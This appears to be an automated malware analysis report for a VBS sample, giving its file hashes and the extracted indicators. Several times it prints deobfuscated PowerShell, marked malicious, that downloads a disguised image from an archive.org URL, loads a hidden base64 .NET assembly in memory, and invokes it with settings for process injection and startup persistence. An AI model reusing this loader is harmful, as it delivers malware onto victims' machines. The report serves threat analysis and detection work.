|
Hash | Hash Value |
|---|---|
| MD5 | bd623574204d3ee8c509c6a014e04907
|
| Sha1 | 56f845784066b71eea31f736c0632b5c01cda649
|
| Sha256 | 89f379f3c244456381a5ac1ffa1530471ef70db4e1a2dd91068ffbc095273dd8
|
| Sha384 | 88a1d4fbe417d574e3119ddb9c2d9b496a658990a87828b9af315269606af284fb4727ee08669f2ff33dadfe59e091eb
|
| Sha512 | 406685b79eec39d4113f90b7fdf7eabeb4d5fac28c1b3eb4841c8545aeaff2592c37379fa6b51389fd9de82d5a4469ad75f7b9bcc797d0c1bc9df4d0f70fdce7
|
| SSDeep | 768:SviIbofhpmZ+sOgioIGaneEoHtmblkBOVG9cZw:Svimv+sOgNxdHmbcOw9cZw
|
| TLSH | 3A83F25BD2754723CA0C694BAA506FF3E4E785AD0AFC9F3197C0952193BDE488DBC428
|
|
Name0 | Value |
|---|---|
| URLs in VB Code - #1 | http://www.ostrosoft.com/smtp.html |
| Deobfuscated PowerShell | Invoke-Expression |
| Deobfuscated PowerShell | $null = ((New-Object "Net.WebClient")."DownloadString"("https://archive.org/download/optimized_msi_20250821/optimized_MSI.png") -match "BaseStart-(.*?)-BaseEnd") $valor = $matches[1] $assembly = [Assembly]::"Load"([Convert]::"FromBase64String"($valor)) $olinia = "=YCM3IGMyYGNkFWZ5UGNiZmYilDNjhjN 2gjNkRTNwUTN5QmY0M2N0IzMkVjN1UGMxMGM3QmMlFGMwcjZwQTOhljM90GamAjYzQGOhhjN9MXa mAzM1ITYhhjN9gXZ/QHe05ichNXYw9VYyFGcfN3bpNWam90LyEjM2UDN0AzN1IjM5QTN4ADNx8SM ycDO1gzNyUDO5ATM4MzN4ETMvMHduVWboNWY0RXYv02bj5CcwFGZy92YzlGZu4GZj9yL6MHc0RHa" $type = $assembly."GetType"("ClassLibrary1.Home") $method = $type."GetMethod"("VAI") $method."Invoke"($null, [object[]] @({ @($olinia, "", "", "Name_File", "AddInProcess32", "", "AddInProcess32", "", "", "", "Name_File", "vbs", "1", "", "", "0", "startup_onstart") } )) |
| Deobfuscated PowerShell | Invoke-Expression |
| Deobfuscated PowerShell | $null = ((New-Object "Net.WebClient")."DownloadString"("https://archive.org/download/optimized_msi_20250821/optimized_MSI.png") -match "BaseStart-(.*?)-BaseEnd") $valor = $matches[1] $assembly = [Assembly]::"Load"([Convert]::"FromBase64String"($valor)) $olinia = "=YCM3IGMyYGNkFWZ5UGNiZmYilDNjhjN 2gjNkRTNwUTN5QmY0M2N0IzMkVjN1UGMxMGM3QmMlFGMwcjZwQTOhljM90GamAjYzQGOhhjN9MXa mAzM1ITYhhjN9gXZ/QHe05ichNXYw9VYyFGcfN3bpNWam90LyEjM2UDN0AzN1IjM5QTN4ADNx8SM ycDO1gzNyUDO5ATM4MzN4ETMvMHduVWboNWY0RXYv02bj5CcwFGZy92YzlGZu4GZj9yL6MHc0RHa" $type = $assembly."GetType"("ClassLibrary1.Home") $method = $type."GetMethod"("VAI") $method."Invoke"($null, [object[]] @({ @($olinia, "", "", "Name_File", "AddInProcess32", "", "AddInProcess32", "", "", "", "Name_File", "vbs", "1", "", "", "0", "startup_onstart") } )) |
| Deobfuscated PowerShell | Invoke-Expression |
|
Name0 | Value | Location |
|---|---|---|
| URLs in VB Code - #1 | http://www.ostrosoft.com/smtp.html |
bd623574204d3ee8c509c6a014e04907 |
| Deobfuscated PowerShell | Invoke-Expression Malicious |
bd623574204d3ee8c509c6a014e04907 > bd623574204d3ee8c509c6a014e04907.deobfuscated.vbs > [Command #0] > [PowerShell Command] |
| Deobfuscated PowerShell | $null = ((New-Object "Net.WebClient")."DownloadString"("https://archive.org/download/optimized_msi_20250821/optimized_MSI.png") -match "BaseStart-(.*?)-BaseEnd") $valor = $matches[1] $assembly = [Assembly]::"Load"([Convert]::"FromBase64String"($valor)) $olinia = "=YCM3IGMyYGNkFWZ5UGNiZmYilDNjhjN 2gjNkRTNwUTN5QmY0M2N0IzMkVjN1UGMxMGM3QmMlFGMwcjZwQTOhljM90GamAjYzQGOhhjN9MXa mAzM1ITYhhjN9gXZ/QHe05ichNXYw9VYyFGcfN3bpNWam90LyEjM2UDN0AzN1IjM5QTN4ADNx8SM ycDO1gzNyUDO5ATM4MzN4ETMvMHduVWboNWY0RXYv02bj5CcwFGZy92YzlGZu4GZj9yL6MHc0RHa" $type = $assembly."GetType"("ClassLibrary1.Home") $method = $type."GetMethod"("VAI") $method."Invoke"($null, [object[]] @({ @($olinia, "", "", "Name_File", "AddInProcess32", "", "AddInProcess32", "", "", "", "Name_File", "vbs", "1", "", "", "0", "startup_onstart") } )) Malicious |
bd623574204d3ee8c509c6a014e04907 > bd623574204d3ee8c509c6a014e04907.deobfuscated.vbs > [Command #0] > [Base64-Block] |
| Deobfuscated PowerShell | Invoke-Expression Malicious |
bd623574204d3ee8c509c6a014e04907 > bd623574204d3ee8c509c6a014e04907.deobfuscated.vbs > [Command #0] > [PowerShell Command] > [Deobfuscated PS] |
| Deobfuscated PowerShell | $null = ((New-Object "Net.WebClient")."DownloadString"("https://archive.org/download/optimized_msi_20250821/optimized_MSI.png") -match "BaseStart-(.*?)-BaseEnd") $valor = $matches[1] $assembly = [Assembly]::"Load"([Convert]::"FromBase64String"($valor)) $olinia = "=YCM3IGMyYGNkFWZ5UGNiZmYilDNjhjN 2gjNkRTNwUTN5QmY0M2N0IzMkVjN1UGMxMGM3QmMlFGMwcjZwQTOhljM90GamAjYzQGOhhjN9MXa mAzM1ITYhhjN9gXZ/QHe05ichNXYw9VYyFGcfN3bpNWam90LyEjM2UDN0AzN1IjM5QTN4ADNx8SM ycDO1gzNyUDO5ATM4MzN4ETMvMHduVWboNWY0RXYv02bj5CcwFGZy92YzlGZu4GZj9yL6MHc0RHa" $type = $assembly."GetType"("ClassLibrary1.Home") $method = $type."GetMethod"("VAI") $method."Invoke"($null, [object[]] @({ @($olinia, "", "", "Name_File", "AddInProcess32", "", "AddInProcess32", "", "", "", "Name_File", "vbs", "1", "", "", "0", "startup_onstart") } )) Malicious |
bd623574204d3ee8c509c6a014e04907 > bd623574204d3ee8c509c6a014e04907.deobfuscated.vbs > [Command #0] > [Base64-Block] > [Deobfuscated PS] |
| Deobfuscated PowerShell | Invoke-Expression Malicious |
bd623574204d3ee8c509c6a014e04907 > bd623574204d3ee8c509c6a014e04907.deobfuscated.vbs > [Command #0] > [Deobfuscated PS] > [PowerShell Command] |